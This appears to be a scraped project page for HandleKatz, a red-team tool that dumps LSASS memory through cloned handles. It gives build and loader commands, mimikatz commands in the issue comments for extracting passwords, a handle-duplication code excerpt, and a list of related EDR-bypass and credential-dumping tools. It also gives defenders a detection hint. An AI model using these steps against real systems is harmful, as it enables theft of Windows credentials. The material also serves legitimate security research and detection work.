PIC lsass dumper using cloned handles

Last update: Dec 28, 2022

Related tags

Overview

HandleKatz

This tool was implemented as part of our Brucon2021 conference talk and demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same.

It compiles down to an executable living fully in its text segment. Thus, the extracted .text segment of the PE file is fully position independent code (=PIC), meaning that it can be treated like any shellcode.

The execution of HandleKatz in memory has a very small footprint, as itself does not allocate any more executable memory and can therefore efficiently be combined with concepts such as (Phantom)DLL-Hollowing as described by @_ForrestOrr. This is in contrast to PIC PE loaders, such as Donut, SRDI or Reflective Loaders which, during PE loading, allocate more executable memory. Additionally, it makes use of a modified version of ReactOS MiniDumpWriteDumpA using direct system calls to write an obfuscated dump to disk.

For detailed information please refer to the PDF file PICYourMalware.pdf in this repository.

Usage

make all to build HandleKatzPIC.exe, HandleKatz.bin and loader.exe

Please note that different compiler (versions) yield different results. This might produce a PE file with relocations.

All tests were carried out using x86_64-w64-mingw32-gcc mingw-gcc version 11.2.0 (GCC). The produced PIC was successfully tested on: Windows 10 Pro 10.0.17763. On other versions of windows, API hashes might differ.

To use the PIC, cast a pointer to the shellcode in executable memory and call it according to the definition:

DWORD handleKatz(BOOL b_only_recon, char* ptr_output_path, uint32_t pid, char* ptr_buf_output);

b_only_recon If set, HandleKatz will only enumerate suitable handles without dumping
ptr_output_path Determines where the obfuscated dump will be written to
pid What PID to clone a handle from
ptr_buf_output A char pointer to which HandleKatz writes its internal output

For deobfuscation of the dump file, the script Decoder.py can be used.

Loader implements a sample loader for HandleKatz:

loader.exe --pid:7331 --outfile:C:\Temp\dump.obfuscated

Detection

As cloned handles are used along with modified ReactOS code, no ProcessAccess events can be observed on Lsass. However, ProcessAccess events on programs which hold a handle to Lsass can be observed.

Defenders can monitor for ProcessAccess masks with set PROCESS_DUP_HANDLE (0x0040) to identify the usage of this tool.

Credits

Implementation by our @thefLinkk, see C-To-Shellcode-Examples for more PIC examples.
@Hasherezade for tutorials on the C-To-Shellcode concept
@ParanoidNinja for tutorials on the C-To-Shellcode concept
@_ForrestOrr for his amazing blogpost series on memory artifacts
@rookuu_ for the idea to use ReactOS MiniDumpWriteDump
Outflank for documenting direct syscalls and their InlineWhispers project
React OS for the implementation of MiniDumpWriteDump
Hilko Bengen for improving the makefile

Comments

ERROR kuhl_m_sekurlsa_acquireLSA

hi, just a feed back on a capture, no issue when using Decode.py but having error when using mimkatz to get login passwords

mimikatz # sekurlsa::minidump toto Switch to MINIDUMP : 'toto'

mimikatz # sekurlsa::logonPasswords Opening : 'toto' file for minidump... ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

mimikatz #

Did another capture on another computer, no error but mimkatz does fc after a while without giving results

for --pid: using lssas.exe pid for the capture.

opened by nocomp 3
make error adjustack.o
hi, just did a new pull for try to compile on windows getting this error now, seems a that adjustack.o is missing

PS C:\Users\nocomp\Documents\tools\HandleKatz> make all nasm -f win64 src/adjuststack.asm -o adjuststack.o process_begin: CreateProcess(NULL, nasm -f win64 src/adjuststack.asm -o adjuststack.o, ...) failed. make (e=2): Le fichier spÚcifiÚ est introuvable. make: *** [makefile:34: adjuststack.o] Error 2 PS C:\Users\nocomp\Documents\tools\HandleKatz> ls

Répertoire : C:\Users\nocomp\Documents\tools\HandleKatz

Mode LastWriteTime Length Name

d----- 22/10/2021 08:13 bin d----- 22/10/2021 08:13 imgs d----- 22/10/2021 08:13 loader d----- 22/10/2021 08:13 src -a---- 22/10/2021 08:13 953 Decoder.py -a---- 22/10/2021 08:13 131 extract.sh -a---- 22/10/2021 08:13 1398 makefile -a---- 22/10/2021 08:13 1551926 PICYourMalware.pdf -a---- 22/10/2021 08:13 3802 readme.md

PS C:\Users\nocomp\Documents\tools\HandleKatz> ls .\src\

Répertoire : C:\Users\nocomp\Documents\tools\HandleKatz\src

Mode LastWriteTime Length Name

-a---- 22/10/2021 08:13 344 adjuststack.asm -a---- 22/10/2021 08:13 7215 ApiResolve.c -a---- 22/10/2021 08:13 16215 APIResolve.h -a---- 22/10/2021 08:13 62 chkstk_ms.asm -a---- 22/10/2021 08:13 23845 DumpTools.c -a---- 22/10/2021 08:13 3720 DumpTools.h -a---- 22/10/2021 08:13 140 HandleKatz.h -a---- 22/10/2021 08:13 4805 HandleKatzPIC.c -a---- 22/10/2021 08:13 4863 HandleTools.c -a---- 22/10/2021 08:13 261 HandleTools.h -a---- 22/10/2021 08:13 102 linker.ld -a---- 22/10/2021 08:13 7917 Misc.c -a---- 22/10/2021 08:13 1612 Misc.h -a---- 22/10/2021 08:13 31567 syscalls.asm -a---- 22/10/2021 08:13 1721 syscalls.h

PS C:\Users\nocomp\Documents\tools\HandleKatz>
opened by nocomp 2
make error

hi, just gave it a try and having an issue creating exe i guess, any tip?

here are the logs, hope it ll help:

nasm -f win64 src/adjuststack.asm -o adjuststack.o nasm -f win64 src/chkstk_ms.asm -o chkstk_ms.o nasm -f win64 src/syscalls.asm -o syscalls.o x86_64-w64-mingw32-gcc src/ApiResolve.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o ApiResolve.o -Wl,-Tlinker.ld,--no-seh -DC2 x86_64-w64-mingw32-gcc src/HandleKatzPIC.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o HandleKatzPIC.o -Wl,-Tlinker.ld,--no-seh -DC2 x86_64-w64-mingw32-gcc src/Misc.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o Misc.o -Wl,-Tlinker.ld,--no-seh -DC2 x86_64-w64-mingw32-gcc src/HandleTools.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o HandleTools.o -Wl,-Tlinker.ld,--no-seh -DC2 x86_64-w64-mingw32-gcc src/DumpTools.c -masm=intel -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o DumpTools.o -Wl,-Tlinker.ld,--no-seh -DC2 x86_64-w64-mingw32-ld -s adjuststack.o ApiResolve.o Misc.o HandleKatzPIC.o HandleTools.o DumpTools.o syscalls.o chkstk_ms.o -o bin/HandleKatzPIC.exe x86_64-w64-mingw32-ld : ne peut ouvrir le fichier de sortie bin/HandleKatzPIC.exe : Aucun fichier ou dossier de ce type make: *** [makefile:10 : make] Erreur 1

br

opened by nocomp 2

Handle leak in error cases in check_handles()

The for loop processes handles for the in_pid process. It creates a couple handles in the process (h_process, dupHandle). On any error encountered it continues the loop and overwrites those handle values, causing the handles to be leaked.

HANDLE check_handles(PSYSTEM_HANDLE_INFORMATION handle_info, DWORD in_pid, char* ptr_output, struct fPtrs* ptr_functions) {

    ...
    HANDLE dupHandle = NULL, h_process = NULL, h_return = NULL;
    ...

    for (idx_handle = 0; idx_handle < handle_info->HandleCount; idx_handle++) {

        entry_info = &handle_info->Handles[idx_handle];

        if (in_pid && in_pid != entry_info->ProcessId)
            continue;

        // Checking some granted access. The internet says, NtDuplicateObject() might hang on these rights
        if (entry_info->GrantedAccess != 0x0012019f && entry_info->GrantedAccess != 0x001a019f && entry_info->GrantedAccess != 0x00120189 && entry_info->GrantedAccess != 0x00100000) {

            if (objectTypeInfo != NULL) {
                ptr_functions->_VirtualFree(objectTypeInfo, 0, MEM_RELEASE);
                objectTypeInfo = NULL;
            }

            uPid.UniqueProcess = entry_info->ProcessId;
            uPid.UniqueThread = 0;

!            NtOpenProcess(&h_process, PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE, &ObjectAttributes, &uPid);   <<<< overwrites any previous h_process handle
!            NtDuplicateObject(h_process, (HANDLE)(uint64_t)entry_info->Handle, NtCurrentProcess(), &dupHandle, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, 0);   <<<<  overwrites previous dupHandle value

            objectTypeInfo = (POBJECT_TYPE_INFORMATION)ptr_functions->_VirtualAlloc(0, 0x1000, MEM_COMMIT, PAGE_READWRITE);
            if (objectTypeInfo == NULL)
                continue;

            status = NtQueryObject(dupHandle, (OBJECT_INFORMATION_CLASS)ObjectTypeInformation, objectTypeInfo, 0x1000, NULL);
            if (!NT_SUCCESS(status)){
!                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration
            }

            if (ptr_functions->_strcmpW(objectTypeInfo->TypeName.pBuffer, str_process))
!                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration

            if (!ptr_functions->_GetModuleFileNameExA(dupHandle, NULL, handle_name, MAX_PATH))
!                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration

            if (!ptr_functions->_GetProcessImageFileNameA(h_process, process_path, MAX_PATH))
!                continue;      <<< dupHandle, h_process leaked as they get overwritten on the next iteration

            ....
        }

    }

    if (h_process != NULL)
        ptr_functions->_CloseHandle(h_process);
 
   if (objectTypeInfo != NULL)
        ptr_functions->_VirtualFree(objectTypeInfo, 0, MEM_RELEASE);

    return h_return;

}

See https://github.com/codewhitesec/HandleKatz/blob/5e18f107694aaeb591c10fa9ec392cf9a7c1bf2b/src/HandleTools.c#L75 and related

opened by JohnLaTwC 1

makefile: Build everything (including loader demo) from source

I wanted to build everything from source before kicking it around in our detection lab. The changes should make the Makefile a bit more robust, too.

Thanks for the great work. Really looking forward to seeing variants of this in the wild again soon. ;-)

opened by hillu 1
Update DumpTools.c

On Windows 11 there is a problem that most times the dumping code does not work when compiled to PIC.

The fix is to set nstreams to 6 instead of 3.

With this fix Handlekatz should work again for Win11 :).

opened by theLangsam 0
Help With running on Windows Server 2008

Hello! I tried running it on windows 10, and it's working perfectly. so I decided to run it also on other OS. I took Windows Server 2008 R2 (6.1.7601) and tested it on it - I don't know why, but it's crashing :(. after a bit debugging the code I saw that it's crashing in the getDllBase. and the crash is because dll_name->pBuffer is 0x400.

Why should it not work on Windows Server 2008? and how can I 'Patch' it so it will work? looks like all the dlls are existing...

Thank you !

opened by DavidSMoore11 4

Owner

CODE WHITE GmbH

GitHub

A PIC/FLIP fluid simulation based on the methods found in Robert Bridson's "Fluid Simulation for Computer Graphics"

GridFluidSim3d This program is an implementation of a PIC/FLIP liquid fluid simulation written in C++11 based on methods described in Robert Bridson's

727 Dec 8, 2022

C++ POC to write addintional credentials into LSASS process

LSASS_Injection_CreateProcessWithLogonW C++ POC to write addintional credentials into LSASS process Usage: LSASS_Injection_CreateProcessWithLogonW USE

3 Feb 9, 2022

A Simple LSASS Credential Injection Tool

CredInject Hello Dear Reader! Welcome to the CredInject repo -- This project is based on HoneyCred and uses the same method to inject credentials into

7 Jun 8, 2022

A Beacon Object File that creates a minidump of the LSASS process.

NanoDump A Beacon Object File that creates a minidump of the LSASS process. Features It uses syscalls (with SysWhispers2) for most operations You can

1.1k Jan 5, 2023

EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections and LSASS protections

EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.

Wavestone - Cybersecurity & Digital Trust

846 Jan 2, 2023

Internal dumper for Unity3d libil2cpp.so

Auto-Il2cppDumper This is for helping you get dump.cs from Il2cpp game hope this will help you >::< Important This project is modifying version of Rir

32 Oct 28, 2022

Just a basic Offsets and Netvar dumper for Apex Legends

Not much to say just an Apex Legends Offsets + Netvar Dumper, it should survive some game updates and also it gave to you almost all you need to updat

59 Dec 31, 2022

A short and sweet hex dumper!

██████╗ ██████╗ ███╗ ███╗██████╗ ██╔═══██╗██╔══██╗████╗ ████║██╔══██╗ ██║ ██║██║ ██║██╔████╔██║██████╔╝ ██║▄▄ ██║██║ ██║██║╚██╔╝██║██╔═══

1 Nov 18, 2021

A dumper for CS:GO cheat loaders that use manual map injection method

NoobDumper v2 A (mostly dll) dumper for CS:GO cheat loaders that use manual map injection method How to use this Inject the dumper into the loader ( x

22 Jul 21, 2022

Simple native jvm class dumper written in C by hook ClassLoader

JVM Native Class Dumper Simple native jvm class dumper written in C by hook ClassLoader What is used for? This tool allows you to dump all java classe

21 Nov 7, 2022

Android Dumper Lib From The Memory

LibDumper This Project Is Using For Make You Easy Dump Lib From The Memory Changelog 3.5 : fixing corrupt file after fixing elf format result dump [st

31 Jan 27, 2022

Simple, fully external, smart, fast, JSON-configurated, feature-rich Windows x86 DLL Memory Dumper with Code Generation. Written in Modern C++.

altdumper Simple, fully external, smart, fast, JSON-configurated, feature-rich Windows x86 DLL Memory Dumper with Code Generation. Written in Modern C

14 Sep 9, 2022

Spotify ogg dumper

Soggfy - SpotifyOggDumper Previous Spotify downloader projects (XSpotify, spotifykeydumper) worked by recovering encryption keys and re-downloading tr

501 Jan 7, 2023

A test using a TTGO module (ESP32 + screen) which renders a 3d scene using pingo library

A simple 3D renderer tested and developed for the TTGO T-Display ESP32 board. The 3d renderer is: https://github.com/fededevi/pingo The 3D renderer is

10 Nov 2, 2022

credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege

forkatz credential dump using forshaw technique using SeTrustedCredmanAccessPrivilege This code is based off of the blog post by james forshaw: https:

117 Nov 21, 2022

Another version of EVA using anti-debugging techs && using Syscalls

EVA2 Another version of EVA using anti-debugging techs && using Syscalls First thing: Dont Upload to virus total. this note is for you and not for me.

273 Dec 26, 2022

In this Program, I am using C language and creating All Patterns Program using Switch case

In this Program, I am using C language and creating All Patterns Program using Switch case. It has 15 pattern programs like a pyramid, half pyramid, etc...

1 Nov 13, 2021

In DFS-BFS Implementation In One Program Using Switch Case I am Using an Simple And Efficient Code of DFS-BFS Implementation.

DFS-BFS Implementation-In-One-Program-Using-Switch-Case-in-C Keywords : Depth First Search(DFS), Breadth First Search(BFS) In Depth First Search(DFS),

1 Nov 17, 2021

multi-sdr-gps-sim generates a IQ data stream on-the-fly to simulate a GPS L1 baseband signal using a SDR platform like HackRF or ADLAM-Pluto.

multi-sdr-gps-sim generates a GPS L1 baseband signal IQ data stream, which is then transmitted by a software-defined radio (SDR) platform. Supported at the moment are HackRF, ADLAM-Pluto and binary IQ file output. The software interacts with the user through a curses based text user interface (TUI) in terminal.

70 Dec 27, 2022